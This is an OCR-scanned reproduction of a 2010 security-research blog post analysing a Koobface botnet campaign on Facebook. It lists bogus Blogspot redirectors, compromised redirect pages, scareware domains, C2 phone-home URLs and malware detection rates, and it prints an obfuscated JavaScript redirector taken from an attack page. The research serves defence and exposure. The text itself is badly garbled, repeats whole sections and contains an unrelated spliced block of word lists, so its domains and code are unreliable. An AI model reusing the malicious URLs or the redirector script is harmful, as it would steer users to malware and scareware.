eloragiogio. blog spot, com 
faubertmacarena.blogspot.com 



friedlamiraslani. blog spot, com 
gallianinijanija.blogspot. com 
gandolphscootscoot.blogspot.com 
garbsayrinayrin. blog spot, com 
geerbergpo vlpo vl. blogspo t. com 
gennygennytjoeng. blog spot, com 
gianiniomegalmegal. blog spot, com 
grifh'thlampack-layton.blogspot. com 
guerrettebrchibrchi. blog spot, com 
guilleminea uramyaramya. blogspo t. com 
gunheedomenick. blog spot, com 
haisedymond. blog spot, com 
halahalafales. blog spot, com 
hamidoujacijaci. blog spot, com 
hamminganoush. blog spot, com 
honamisouliotis. blog spot, com 
japeriagoding. blog spot, com 
jaymeecleto. blog spot, com 
jinghuamarmorale. blog spot, com 
kadeemrebsamen.blogspot. com 



karokaroliney. blog spot, com 
kashmirahoeger. blog spot, com 
kasidasa ugus t. blogspo t. com 
ka tty la itia. blog spot, com 
kaynatferetos. blog spot, com 
kimberlikohlmann. blog spot, com 
kissikshaney. blog spot, com 
kjerstisatterwhite-landry. blog spot, com 
korbessamessam.blogspot. com 
kozubmarshand. blog spot, com 
kruthjancijanci. blog spot, com 
krystellecahoon.blogspot. com 
kuroiwadelphdelph. blog spot, com 
laakkokimkim. blog spot, com 
labbatoalphaj.blogspot.com 
leichtmarjmarj. blog spot, com 
leludis-ma tarangasdeyonna.blogspot. com 
lescailletpetopeto.blogspot.com 
letsongro ver. blog spot, com 
liermanramadan.blogspot. com 



lindingrajkishan. blog spot, com 
linsjerchell. blog spot, com 
lorrilorrihosgor. blog spot, com 
maglifitfit. blog spot, com 
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matsumarudeserae. blog spot, com 
mcsteinniecey. blog spot, com 
melitalynnelynne.blogspot. com 
menezes wendywendy. blog spot, com 
mimosepalazon.blogspot. com 
mottmottzengel. blogspot. com 
naysanm utton.blogspo t. com 
nicolenabershon. blog spot, com 
nidonidobueto w. blog spot, com 
ninaninalottin. blog spot, com 
nonziodarasha.blogspot. com 
pandushalmon. blog spot, com 
pa we I pa welpoti. blog spot, com 
paytonbeegle. blog spot, com 
phillipoeleaseleas. blogspo t. com 



philpottlurelle. blog spot, com 
pipenhagennguyen.blogspot.com 
pi a ttsda tori a. blog spot, com 
plomaritisla uryla ury. blog spot, com 
polmantameltamel. blog spot, com 
polopoloangulo.blogspot.com 
porrettifarmers, blog spot, com 
radi era dieca ta Una. blogspo t. com 
raenellegreathouse. blog spot, com 
ranaeranaerossy. blog spot, com 
reidreidmiele-crifo. blog spot, com 
rickyrickydonis. blog spot, com 
roselinegilvin. blog spot, com 
russobriarbriar. blog spot, com 
salizaguayanilla. blog spot, com 
samuelesedere. blog spot, com 
sanchepascasie. blog spot, com 
sangyoungpadalecki. blog spot, com 
scarthscre wlie. blog spot, com 
sc ha umburgirishirish.blogspot. com 



schubringdheledhele. blog spot, com 
scorahchreechree. blog spot, com 
shakehcoletto. blog spot, com 
shaqareqninette. blog spot, com 
sha w-zorichemmanemman.blogspot. com 
shortalgerongeron.blogspot. com 
singhoffertymisha. blog spot, com 
sinnathuraiperminas. blog spot, com 
skjutarevikram. blog spot, com 
spa taforaannamay. blog spot, com 
staats-meliaahronahron. blog spot, com 
tagantagankissane.blogspot. com 
tamietamiedemirkol. blog spot, com 
tamilleca vitt. blog spot, com 
tommiekerstetter. blog spot, com 
336 
2 

tosunsangbum.blogspot. com 
treechadacoppage. blog spot, com 
treziajoanjoan.blogspot. com 


triadorlacha una.blogspot. com 
tukellyaburrage. blog spot, com 
tyrisaoverly. blog spot, com 
ulrikaraithatha.blogspot. com 
valericlarissa.blogspot. com 
vert tronejokerjoker. blogspo t. com 
victorinomeharmehar. blog spot, com 
vikvikrua ut. blog spot, com 
vlrajanrajan. blog spot, com 
wasonmarilynn.blogspot.com 
wende wendeschyma.blogspot. com 
whitwhitmontoure. blog spot, com 
wynnhannan. blog spot, com 
xochitlvillenurve. blog spot, com 
yaoskalongthorne. blog spot, com 
youyoustreit. blog spot, com 
zickkirrakirra. blog spot, com 

The Blogspot accounts redirect to the following compromised 
Koobface and sea re ware serving domains: 

cartujo.org/private-clips/main.php?87bb8f2 



cerclewalloncouillet.be /main.movie/main.php?28d 

cseajudiciary. org /animateddvd/main.php ?c8 

de-nachtegaeie.be /main/main.php?b04ebb 

ediltermo. com /common, film/main.php ?deccfd 

forwardmarchministries.org /candid movie/main.php? 
42dl 

high way77truckservice. com /pretty-clip/main.php ? 
7bb2 
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kcresale, com /crazyvids/main.php ?2ee 

libermann.phpnet. org /comicperformans/main.php ? 
9b5a5a 

lode-willems.be /cute _clip/main.php?be2 

lunaairforlife. com /crucial-clips/main.php ?d3d6ccfe 

mainteck-fr.com /compiete-movie/main.php?f6 

nottinghamdo wns. com /criminaltube/main.php ?2388d 

programs.ppbsa.org /crazy _ video/main.php?0eal969 

richmondpowerboat.com /yourtv/main.php?89fb0 

scheron.com /delightful demonstration/main.php? 
e2f92 

Training.ppbsa.org /comic _dvd/main.php?f9261f 


vangecars. it /crazy- films/main.php?827da 


Detection rates for Koobface samples and a sampled 
sea re ware: 

- setup.exe - [7 JTrojan.Generic. KD.8890 - Result: 9/40 
(22.50 %) phones back to: 

- proelec-dpt.fr/.85rfs/?action=ldgen &a=-1394498804 
&v=108 &c_fb=0 &ie=7.0.5730.13 

- proelec-dpt.fr/.85rfs/?action=fbgen &v=108 
&crc=669 

- proelec-dpt. fr/. 85rfs/?getexe=p. exe 

- p.exe - [8]Trojan.Drop.Koobface.J; W32/Koobface.GUB 

- Result: 5/41 (12.2 %) 

- koob.js - [9]Trojan:JS/Redirector - Result: 1/41 (2.44 %) 

The scareware serving domain embedded on all of the 
Koobface-serving compromised hosts is internet- 

scanner.xorg.pl?mid=312 &code=4dbl2f &d=l &s=2 - 

195.5.161.125 - AS31252, STARNET-AS StarNet Moldova. 

Parked on 195.5.161.125 is the rest of the scareware 
domains portfolio: 

antispy-detectnl.com - Email: test@now.net.cn 
antispy-detectn2.com - Email: test@now.net.cn 
antispy-detectn3.com - Email: test@now.net.cn 
antispy-detectn5.com - Email: test@now.net.cn 



antispy-detectn7.com - Email: test@now.net.cn 
antispy-detectz2.com - Email: test@now.net.cn 
antispy-detectz4.com - Email: test@now.net.cn 
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antispy-detectz5.com - Email: test@now.net.cn 
antispy-detectz7.com - Email: test@now.net.cn 
antispy-detectz9.com - Email: test@now.net.cn 
antispy-scan4i.com - Email: test@now.net.cn 
antispy-scan5i.com - Email: test@now.net.cn 
antispy-scan6i.com - Email: test@now.net.cn 
antispy-scan7i.com - Email: test@now.net.cn 
antispyscan85.com - Email: test@now.net.cn 
antispyscan89.com - Email: test@now.net.cn 
antispyscan91.com - Email: test@now.net.cn 
antispyscan92.com - Email: test@now.net.cn 
antispyscan93.com - Email: test@now.net.cn 
antispy-scan9i.com - Email: test@now.net.cn 
antispyware-nol.com - Email: test@now.net.cn 
antispyware-no3.com - Email: test@now.net.cn 
antivirl a. com.xorg.pl 



antivirus-detect21.com - Email: test@now.net.cn 
antivirus-detect23.com - Email: test@now.net.cn 
antivirus-detect25.com - Email: test@now.net.cn 
antivirus-detect27.com - Email: test@now.net.cn 
antivirus-detect29.com - Email: test@now.net.cn 
antivirus-detectzl.com - Email: test@now.net.cn 
antivirus-detectz2.com - Email: test@now.net.cn 
antivirus-detectz5.com - Email: test@now.net.cn 
antivirus-detectz7.com - Email: test@now.net.cn 
antivirus-detectz9.com - Email: test@now.net.cn 
antivirus-lvl.com - Email: test@now.net.cn 
antivirus-lv2.com - Email: test@now.net.cn 
antivirus-lv3.com - Email: test@now.net.cn 
antivirus-lv5.com - Email: test@now.net.cn 
antivirus-iv8.com - Email: test@now.net.cn 
antivirus-topl.com - Email: test@now.net.cn 
antivirus-top2.com - Email: test@now.net.cn 
antivirus-top6.com - Email: test@now.net.cn 
antivirus-top8.com - Email: test@now.net.cn 
be-secured. xorg.pl 
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bestantivirusl. com.xorg.pl 

bestscanmalware. com.xorg.pl 

best-security.xorg.pl 

defender20.xorg.pl 

fastantivirusscannerl 5. com.xorg.pl 

fastmalwarescanl5.com.xorg.pl 

fast-scan.xorg.pl 

fastweb-scanner.com.xorg.pl 

get-protection.xorg.pl 

my-computers. xorg.pl 

protection 100.xorg.pl 

protection-centerl .xorg.pl 

protectorl 0. xorg.pl 

securelO.xorg.pl 
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security 1 .xorg.pl 
security 100.xorg.pl 
spy-defenderl. com 


spydefenderl. com.xorg.pl 
spydefenderl 1. com.xorg.pl 
spy-defenderla.com - Email: test@now.net.cn 
spy-defender2.com - Email: test@now.net.cn 
spy-defender2a.com - Email: test@now.net.cn 
spy-defender4a.com - Email: test@now.net.cn 
spy-defender5.com - Email: test@now.net.cn 
spy-defender6a.com - Email: test@now.net.cn 
spy-defender8a.com - Email: test@now.net.cn 
spy-defender9.com - Email: test@now.net.cn 
spy-protection01.com - Email: test@now.net.cn 
spy-protectionl.com - Email: test@now.net.cn 
spy-protectionl4.com - Email: test@now.net.cn 
spy-protectionl7.com - Email: test@now.net.cn 
spy-protectionl9.com - Email: test@now.net.cn 
spy-protection3.com - Email: test@now.net.cn 
spy-protection4.com - Email: test@now.net.cn 
spy-protection6.com - Email: test@now.net.cn 
spy-protection8.com - Email: test@now.net.cn 
spy-scanner2i.com - Email: test@now.net.cn 



spy-scanner6i.com - Email: test@now.net.cn 
spy-scanner8i.com - Email: test@now.net.cn 
spyware-sweepl.com - Email: test@now.net.cn 
spyware-sweepli.com - Email: test@now.net.cn 
spyware-sweep2i.com - Email: test@now.net.cn 
spyware-sweep3.com - Email: test@now.net.cn 
spyware-sweep3i.com - Email: test@now.net.cn 
spyware-sweep4i.com - Email: test@now.net.cn 
spyware-sweep5.com - Email: test@now.net.cn 
spyware-sweep7.com - Email: test@now.net.cn 
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spyware-sweep8.com - Email: test@now.net.cn 
spyware-sweep9i.com - Email: test@now.net.cn 
virus-sweeperOi.com - Email: test@now.net.cn 
virus-sweeperl.com - Email: test@now.net.cn 
virus-sweeper2.com - Email: test@now.net.cn 
virus-sweeper2i.com - Email: test@now.net.cn 
virus-sweeper3.com - Email: test@now.net.cn 
virus-sweeper4i.com - Email: test@now.net.cn 


virus-sweeper6.com - Email: test@now.net.cn 
virus-sweeper7i.com - Email: test@now.net.cn 
virus-sweeper8.com - Email: test@now.net.cn 
virus-sweeper8i.com - Email: test@now.net.cn 

win-antispywarel 0. com.xorg.pl 

windefenderl .xorg.pl 

win do ws-secure.xorg.pl 

win-security.xorg.pl 

win webscannerl 0. com.xorg.pl 

Parked within AS31252, STARNET-AS Star Net Moldova are 
also: 195.5.161.11; 195.5.161.145 

spy-scanner20.com - Email: test@now.net.cn 

spy-scanner30.com - Email: test@now.net.cn 

spy-scanner3i.com - Email: test@now.net.cn 

spy-scanner40.com - Email: test@now.net.cn 

spy-scanner4i.com - Email: test@now.net.cn 

spy-scanner60.com - Email: test@now.net.cn 

spy-scanner80.com - Email: test@now.net.cn 

virscanner-done4.com - Email: test@now.net.cn 

virscanner-done5.com - Email: test@now.net.cn 



- Detection rate for the scareware sample: Setup _312s2.exe 

- [10 JHeuristic.Beha vesLike. Win32. Trojan.H - Result: 
5/40 (12.50 %) phones back to windows-mode.com/? 
b=lsl - 89.248.168.21, AS29073, ECATEL-AS, Ecatel 

Network - Email: contact@privacy-protect.cn 
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Parked on the phone-back IP are also the following domains: 

firewall-rules2.com - Email: contact@privacy-protect.cn 

version-upgrade.com - Email: contact@privacy-protect.cn 

2accommodation.com - Email: ttvmaill2@hotmail.com 

systemreserves.com - Email: contact@privacy-protect.cn 

cariport.com - Email: contact@privacy-protect.cn 

spybiocktest.com - Email: contact@privacy-protect.cn 

antispywareiist.com - Email: contact@privacy-protect.cn 

checkwhiteiist.com - Email: contact@privacy-protect.cn 

chekmalwareiist.com - Email: contact@privacy-protect.cn 

Stay tuned for more updates on recent Koobface gang 
activities, beyond the Koobface botnet. 

Related Koobface gang/botnet research: 

[HJKoobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 


[12J10 things you didn't know about the Koobface gang 

[13] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[14] How the Koobface Gang Monetizes Mac OS X Traffic 

[15] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[16] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[17] Koobface Botnet Starts Serving Client-Side Exploits 

[18] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[19] Koobface Botnet's Scareware Business Model - Part Two 

[20] Koobface Botnet's Scareware Business Model - Part One 

[21 ]Koobface Botnet Redirects Face book's IP Space to my 
Blog 

[22] New Koobface campaign spoofs Adobe's Flash updater 

[23] Social engineering tactics of the Koobface botnet 

[24] Koobface Botnet Dissected in a Trend Micro Report 

[25] Movement on the Koobface Front - Part Two 

[26] Movement on the Koobface Front 

[27] Koobface - Come Out, Come Out, Wherever You Are 
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[28]Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [29]Dancho 
Danchev's blog. Follow him [30]on Twitter. 

1. http://twitter.com/Real_Koobface 

2. httD://bloas. zdnet. com/securit v/? p=5452 

3. httoj//www.aooale.com/safebrowsina/diaanostic? 
site=xor a.D\/ 
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Dissecting Koobface Gang's Latest Face book 
Spreading Campaign (2010-04-27 14:53) 

UPDATED: Thursday, April 29, 2010: Google is aware of 
these Blogspot accounts, and is currently suspending them. 

































During the weekend, our "dear friends" from [ljthe 
Koobface gang - folks, you're so not forgotten, with the 
scale of diversification for your activities to be publicly 
summarized within the next few days - launched another 
spreading attempt across Facebook, with Koobface-infected 
users posting bogus video links on their walls. 

• Recommended reading: [2] 10 things you didn't know 
about the Koobface gang 

What's particularly interesting about the campaign, is that 
the gang is now start to publicly acknowledge its 
connections with [3 Jxorg.pl (Malicious software includes 
40706 scripting exploit(s), 4119 trojan(s), 1897 exploit(s), 
with an actual subdomain residing there embedded on 
Koobface-serving compromised hosts. 

Moreover, the majority of sea reware domains, including the 
redirectors continue using hosting services in 

Moldova, AS31252, STARNET-AS Star Net Moldova in 
particular. 

• [4] Koobface Redirectors and Sea re ware Campaigns 
Now Hosted in Moldova 
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With the campaign still ongoing it's time to dissect it, expose 
the sea reware domains portfolio and the AS29073, ECATEL- 
AS connection, with the Koobface gang a loyal customer of 
their services since November, 2009. AS29073, ECATEL-AS 
Koobface gang connections: 

• [5]Koobface Botnet's Scareware Business Model - 
Part Two 


• [6]The Koobface Gang Wishes the Industry "Happy 
Holidays" 

Automatically registered Blog spot accounts used as bogus 
video links across Facebook: 

aashikamorsing. blog spot, com 

alpezajeromie. blog spot, com 

andcoldjackey. blog spot, com 

asiaasiabenzaidi. blog spot, com 

a talaygraciani. blog spot, com 

barsheshetshakira t. blogspo t. com 

ba ttittastelzer. blog spot, com 

beckermasico. blog spot, com 

biedlerharjit. blog spot, com 

britainudobot. blog spot, com 

bruchnadirnadir. blog spot, com 

bryonbryonhofhenke.blogspot.com 

cecelia verner. blogspo t. com 

centofantia viran.blogspot. com 

codeycodeymarcott. blog spot, com 

cottinghamginnyginny. blog spot, com 

courtenayharry. blog spot, com 



dalton-da viesheinee. blog spot, com 
dipietroa udrea.blogspot. com 
ericssonbrigid. blog spot, com 
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ervinervinturnquest. blog spot, com 
fashingbauerkylerkyler. blog spot, com 
felicetanae. blog spot, com 
friedamignogna.blogspot. com 
friedlamiraslani. blog spot, com 
garthgarthheal. blog spot, com 
ga vin- williamslielie. blog spot, com 
ginno viaharbottle. blog spot, com 
grinolsisanna.blogspot. com 
hamiltondesantis. blog spot, com 
hananhananmoros-hanley. blog spot, com 
heberheberdellinger. blog spot, com 
iftikharkacykacy. blog spot, com 
im tiazzimmer. blogspo t. com 
ireneirenejasmen. blog spot, com 
jacojaco wintermeyer. blog spot, com 



jameishaleninger. blog spot, com 
jhalaagustin.blogspot. com 
johnathenmirani. blog spot, com 
kassablynnelle. blog spot, com 
kaycieazoni. blog spot, com 
keeferjeneejenee. blog spot, com 
keibakeibaclarembeaux. blog spot, com 
kieroncro wdus. blog spot, com 
kilcullenheadhead. blog spot, com 
kreuzaa vins. blog spot, com 
labba toalphaj. blog spot, com 
lellpeyton.blogspot. com 
marleenmckoi. blog spot, com 
mccarlbargin. blog spot, com 
mendizabalnayranayra.blogspot. com 
mitranoshaghayegh.blogspot. com 
momoneybeltz. blog spot, com 
mushenkolirian. blog spot, com 
na varretemcarthur. blog spot, com 
nekolnekoltasler. blog spot, com 



nightrasteyn. blog spot, com 
nushnushca ve.blogspot. com 
ortiz-maynardyvreene. blog spot, com 
padalinodarcydarcy. blogs pot. com 
pantslalala.blogspot.com 
papsteinha tern wahsh.blogspot. com 
pa van pa vandekelver. blog spot, com 
pencekleighan. blog spot, com 
puzderdenzel. blog spot, com 
rabiarabiacarruth.blogspot. com 
raeferaefejhanmmat.blogspot.com 
raheelolu. blog spot, com 
ranaranakundu. blog spot, com 
sabeenhunjan.blogspot.com 
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serroukhshymia. blogspo t. com 
sertimamislay. blog spot, com 
shannonschronce. blog spot, com 
sheridanpaltiel. blog spot, com 
slomovitzvaughna.blogspot.com 



soccicoitcoit. blog spot, com 
stengel-bohneina veina v.blogspot. com 
suedeglenna.blogspot. com 
sylvainbarnes-rivers. blog spot, com 
tammeybutenko. blogspot. com 
tartaglia tray vis. blogspo t. com 
tasunanette. blog spot, com 
teddiedommasch.blogspot. com 
temitopetodoro va. blogspo t. com 
terranovataiwan. blogspot. com 
torneyatsushi. blogspot. com 
tro vatohaiahaia.blogspot. com 
tuncelintrieri. blogspot. com 
vislayo vado vad. blogspot. com 
wellkensie. blogspot. com 
yabsleyjessajessa. blogspot. com 
zedzedmorelle. blogspot. com 

UPDATED: Thursday, April 29, 2010: Another update 
Blogspot Accounts courtesy of the Koobface gang: 

aaslehnekaya.blogspot.com 



aimanaimanpaulis. blog spot, com 
altonaltonbruyninckx. blog spot, com 
annemiekenorford.blogspot.com 
asghardch. blog spot, com 
a tencioishmael. blogspo t. com 
a tivanichayaphongdionysios. blogspo t. com 
ayorindesa voia. blogspo t. com 
bagnoandreae.blogspot.com 
bakalarczykmaipumaipu. blog spot, com 
baribarithulin.blogspot. com 
be a vorda wneda wne. blog spot, com 
boninidivandivan. blog spot, com 
cabooterfinne. blog spot, com 
chakkarinlehnertz. blog spot, com 
cha varriaarumugam. blog spot, com 
coleirolenaylenay. blog spot, com 
colkittmogens. blog spot, com 
crummittgerhardt.blogspot. com 
dahmeiale veque. blog spot, com 
dalmolinparamparam. blog spot, com 



danaedanaemadan.blogspot.com 
danmakumaak. blog spot, com 
da un tazusaazusa. blogspo t. com 
devrimmasaimasai. blog spot, com 
dicksdeplancke. blog spot, com 
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dormiedyismael. blog spot, com 
dremadremareany. blog spot, com 
duffinflippen. blog spot, com 
eliyahneubecker. blog spot, com 
eloragiogio. blog spot, com 
fa ubertmacarena.blogspot. com 
friedlamiraslani. blog spot, com 
gallianinijanija.blogspot. com 
gandolphscootscoot.blogspot.com 
garbsayrinayrin. blog spot, com 
geerbergpo vlpo vl. blogspo t. com 
gennygennytjoeng. blog spot, com 
gianiniomegalmegal. blogspot. com 
griffithlampack-layton.blogspot. com 



guerrettebrchibrchi. blog spot, com 
guilleminea uramyaramya. blogspo t. com 
gunheedomenick. blog spot, com 
haisedymond. blog spot, com 
halahalafales. blog spot, com 
hamidoujacijaci. blog spot, com 
hamminganoush. blog spot, com 
honamisouliotis. blog spot, com 
japeriagoding. blog spot, com 
jaymeecleto. blog spot, com 
jinghuamarmorale. blog spot, com 
kadeemrebsamen.blogspot.com 
karokaroliney. blog spot, com 
kashmirahoeger. blog spot, com 
kasidasaugust. blog spot, com 
ka tty la itia. blog spot, com 
kayna tferetos. blog spot, com 
kimberlikohlmann.blogspot. com 
kissikshaney. blog spot, com 
kjerstisatterwhite-landry. blog spot, com 



korbessamessam.blogspot. com 
kozubmarshand. blog spot, com 
kruthjancijanci. blogspot. com 
krystellecahoon.blogspot. com 
kuroiwadelphdelph.blogspot. com 
laakkokimkim. blog spot, com 
labba toalphaj. blog spot, com 
leichtmarjmarj. blog spot, com 
leludis-ma tarangasdeyonna.blogspot. com 
lescailletpetopeto. blog spot, com 
letsongro ver. blog spot, com 
liermanramadan. blog spot, com 
lindingrajkishan. blog spot, com 
linsjerchell. blog spot, com 
lorrilorrihosgor. blog spot, com 
maglifitfit. blog spot, com 
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matsumarudeserae. blog spot, com 
mcsteinniecey. blog spot, com 
melitalynnelynne.blogspot. com 



menezes wendywendy. blog spot, com 
mimosepalazon.blogspot. com 
mottmottzengel. blog spot, com 
naysanm utton.blogspo t. com 
nicolenabershon. blog spot, com 
nidonidobueto w. blog spot, com 
ninaninalottin. blog spot, com 
nonziodarasha.blogspot. com 
pandushalmon. blog spot, com 
pa we I pa welpoti. blog spot, com 
paytonbeegle. blog spot, com 
phillipoeleaseleas. blog spot, com 
philpottlurelle. blog spot, com 
pipenhagennguyen.blogspot.com 
pi a ttsda tori a. blog spot, com 
plomaritisla uryla ury. blogspo t. com 
polmantameltamel.blogspot.com 
polopoloangulo.blogspot.com 
porretti farmers, blog spot, com 
radi era dieca ta Una. blogspo t. com 



raenellegreathouse. blog spot, com 
ranaeranaerossy. blog spot, com 
reidreidmiele-crifo. blog spot, com 
rickyrickydonis. blog spot, com 
roselinegilvin. blog spot, com 
russobriarbriar. blog spot, com 
salizaguayanilla. blog spot, com 
samuelesedere. blog spot, com 
sanchepascasie. blog spot, com 
sangyoungpadalecki. blog spot, com 
scarthscre wlie. blog spot, com 
sc ha umburgirishirish.blogspot. com 
schubringdheledhele. blog spot, com 
scorahchreechree. blog spot, com 
shakehcoletto.blogspot. com 
shaqareqninette. blog spot, com 
sha w-zorichemmanemman.blogspot. com 
shortalgerongeron.blogspot.com 
singhoffertymisha.blogspot. com 
sinnathuraiperminas. blogspot. com 



skjutarevikram. blog spot, com 
spataforaannamay. blog spot, com 
staats-meliaahronahron. blog spot, com 
tagantagankissane.blogspot.com 
tamietamiedemirkol. blog spot, com 
tamilleca vitt. blog spot, com 
tommiekerstetter. blog spot, com 
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crisis duff gleam lambaste bie° outwit rob sbver statue sufficient turautoaous twine 

blight boor boorish duress infernal nominate old-fashioned put-u|> rubbish suggestive tamper tolly 

clique consiibe* cycle down edification femt beavy-handed impact loose snake-up pleasvre quack shrubbery tneley 
banc dapple fickle harn&ss leaden mute performance be 

amply clergyman disgusting first-rate general*/ length merry perimeter prepare rough tempestuous izreficed visitor 

cannibal ehlM distinct tot gust grut march mockery persuasive rationale scrawl slim stoicism stray testimonial 


cap downwards enchanting flout frightful fritter gratitude migrant mismatched officer playboy single-minded 


active adolescent deviate expedite finery flash for obsessive premeditated prepare settle sobdanfty suggestible 

couch curt passable ply refuse^ scepticism security uH* 

ad-ict eckpse gossp interval invariable jumble mournful mutation noiseless resemble secular 
bowly combine devious godsend landlady lasting revelry rou. skm social uproarious 

book boundary crest engraving fitful hop idyllic memory personally popularity raise remiss revolve stipulate 


beieave dmiuiunicuig enigma huth 0 moonshine nab pnsnne lap muled 

aged .die.id calendai hau inviting metiopolis paj amount leconnoitie understand upheaval usage 

abated appropriate confidence exceeding treasure slave suckle wares waspish 

chimp dtftmct drrrel feeeral rruerf* station negfeger.ee recommend representative take rental shoot snoop solo vituperative 

adopt allege among antidote capital dizzy hiinmous muggy' u«\ semug showdown unsetthug 


tosunsang bum. blog spot, com 
treechadacoppage. blog spot, com 
treziajoanjoan.blogspot. com 
triadorlacha una. blog spot, com 





tukellyaburrage. blog spot, com 
tyrisaoverly. blog spot, com 
ulrika ra it ha tha. blogspo t. com 
valericlarissa.blogspot. com 
vert tronejokerjoker. blogspo t. com 
victorinomeharmehar. blog spot, com 
vikvikrua ut. blog spot, com 
vlrajanrajan. blog spot, com 
wasonmarilyrm.blogspot. com 
wende wendeschyma.blogspot. com 
whitwhitmontoure. blog spot, com 
wynnhannan. blog spot, com 
xochitlvillenurve. blog spot, com 
yaoskalongthorne. blog spot, com 
youyoustreit. blog spot, com 
zickkirrakirra. blog spot, com 

The Blogspot accounts redirect to the following compromised 
Koobface and sea re ware serving domains: 

cartujo.org/private-clips/main.php?87bb8f2 

cercle walloncouillet. be /main, movie/main.php ?28d 



cseajudiciary. org /an ini a teddvd/main.php ?c8 
de-nachtegaeie.be /main/main.php?b04ebb 
ediltermo. com /common, film/main.php Tdeccfd 


forwardmarchministries.org /candid movie/main.php? 
42dl 

high way77truckservice. com /pretty-clip/main.php ? 
7bb2 



<title>Loading</title > 

OkI a iM«a»-' , rabots* content •"no index, nut lav. ooarchlve"> 

<ecript > 

function a89CtoO*7af 4b57ej D3f 82 () (tryi window, parent. location-location; ) catch(e) () try< window.top. location-location;)catch(e) 

()»window.onerror«a890to07af4b57e303f82;if(window.parent.frames.iength>0|if(window.parent.docunent.body.innerBTKL); 

</wcript> 

<*crlpt> 

bf f9d3l7dcl3dec7af- N llqx3h)sX vweat Eye”, rep lace (/(qxhj sweaty)4/g,*"|;if(navigator.appVers ton.indexOf(bff9d3l7del3dcc7af)>0)(window.c03b380c 
f unct ion dififIfb40e7fc () (var aaab8c208c-window. navigator. user Agent; var ab9f2 52e773 10c-aeab0c208c. index Of (bff9d317dc 13dcc7af 
Ilf |ato9f2S2e77310c>0)return p-araelot (aaab8c208c.sufc>str ing|ab9f252e77310c4S,aaeb8c208c. lndexOf (' . * ,ab9f2S2e77310c)) I ;return 
0;>window.f905l7aaf3e-dif6fIfb40e7feO;I function g522dfeaa<1730dd44>(if(window.e03b360dff883j(if(window.f905l7aaf3e«) 

( window.open <1730dd44); (else(document .qettlcrrentf yldCccMeadc") . launchUPL 117)Odd ii) ;) >else< location, href- 1730dd44;> i function bc4bb2a6bif 

false;I if(window.attachEvent)window.attachEvent('onunload',hc4bb2aib6876);elae window.addZventListener(* unload',hc4bb2a6b6876 r falael; 

k2119c64b3db06fbd-”<fn3b03kBqJ»klEqCkTl»ql binndo-plcbc3opp6fiopenlanoqdnnbqcf wfqijdfntaoolhof-Oj jkhlnelo} mnglhj jtrrnk-jf fOqq".replace(/ 

fc2219ciib3db06fbd4-" gkgCbtLssAbtaSwivvSjoxlgfPlp-qfCriyvLkhkx3ubhXeoDbpme:neql6cgftnvntrsxgSekl2ufbAviog3upjvc2»lv-tb3ub9yerii>4oyAlcgs-twyr 1 
cnljBavxyl»vw5VDgn3vs-ytyte0yvfs01uqvCcql0egnio4bairkhk379c9ibaFpqqkAcvAifqy6qga".replace (/ (gkbtsmwjoxf lpqr lyvhuaenc] 4/g, ; 

k2119c6ib3db06fbd4- N tantyhhpeaeghgh-haf hpkgnpfahldiacmgnat tdhodkdnh/khgxgg-daof Ideokhbhj egkcgfgt h>gh <gPfAkfdfchkAgkBh". replace (/ (knhgfd] *f 
fc2ll9ciib3db04fbd4-" bfcNbAf icllikE)f-f kSnbef inckjdiPfbOecyicSmtsoamtekf CmhbjafcRafgef jbEc ivj icifciktbsb 
fVcviAjcLbi l&Eltb-f fkTmf r uf elb>as“. replace (/ (bfcik3»] 4/g, j 

fc2119c64b3db06fbd4-"<pPgiAqcR»haAqdJth hqgNdgAqhBEhisj-phlbAmunlgktjteoigSgtobctchagqrhltqp 
IgmVqdAjLhgUkct idep-df gfgccduql lef f >oohh". replace (/(pgiqcuhsd) Ibnkf) 4/g, **) ; 

fc2119ci4b3db06fl>d4-"<khpPcAPAkbltkkk jpnjgajbcioej-ff ubhipBhkjodcge ckbvfbacclguke-fnpohcnkjecbpg>c".replace (/ (khpcbjgt) 4/g,”"| ; 
fc2119c£4b3db06fbd4-"<gdgPdhAf iRkbAikB) ckndkacgcnjpei-pPi jbplafhyibpbCbfodkoghtncdtggf <fevi3afcdlfdhkugdhhfe-gh9phd9fcc9gh9f> 
<dc/hbOcbBgJigcEhbC)hbTpt>kf".replace(/(gdhfakbejp]♦/g,■*)I 
document. wr lte (It2119c64b3db06£bd|; 


kcresale, com /crazyvids/main.php ?2ee 

libermann.phpnet. org /comicperformans/main.php ? 
9b5a5a 

lode-willems.be /cute _clip/main.php?be2 
lunaairforlife. com /crucial-clips/main.php ?d3d6ccfe 
mainteck-fr.com /compiete-movie/main.php?f6 
nottinghamdo wns. com /criminaltube/main.php ?2388d 




programs.ppbsa.org /crazy _ video/main.php?0eal969 

richmondpo werboat. com /yourtv/main.php ?89fb0 

scheron.com /delightful demonstration/main.php? 
e2f92 

Training.ppbsa.org /comic _dvd/main.php?f9261f 

vangecars. it /crazy- films/main.php?827da 

Detection rates for Koobface samples and a sampled 
sc a re ware: 

- setup.exe - [7 JTrojan. Generic. KD.8890 - Result: 9/40 
(22.50 %) phones back to: 

- proelec-dpt.fr/.85rfs/?action=ldgen &a=-1394498804 
&v=108 &c_fb=0 &ie=7.0.5730.13 

- proelec-dpt.fr/.85rfs/?action=fbgen &v=108 
&crc=669 

- proelec-dpt. fr/. 85rfs/?getexe=p. exe 

- p.exe - [ 8 JTrojan. Drop. Koobface.J; W32/Koobface.CUB 

- Result: 5/41 (12.2 %) 

- koob.js - [9]Trojan:JS/Redirector - Result: 1/41 (2.44 %) 

The scareware serving domain embedded on all of the 
Koobface-serving compromised hosts is internet- 

scanner.xorg.pl?mid=312 &code=4dbl2f &d=l &s=2 - 

195.5.161.125 - A531252, STARNET-AS StarNet Moldova. 

Parked on 195.5.161.125 is the rest of the scareware 
domains portfolio: 



antispy-detectnl.com - Email: test@now.net.cn 
antispy-detectn2.com - Email: test@now.net.cn 
antispy-detectn3.com - Email: test@now.net.cn 
antispy-detectn5.com - Email: test@now.net.cn 
antispy-detectn7.com - Email: test@now.net.cn 
antispy-detectz2.com - Email: test@now.net.cn 
antispy-detectz4.com - Email: test@now.net.cn 
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antispy-detectz5.com - Email: test@now.net.cn 
antispy-detectz7.com - Email: test@now.net.cn 
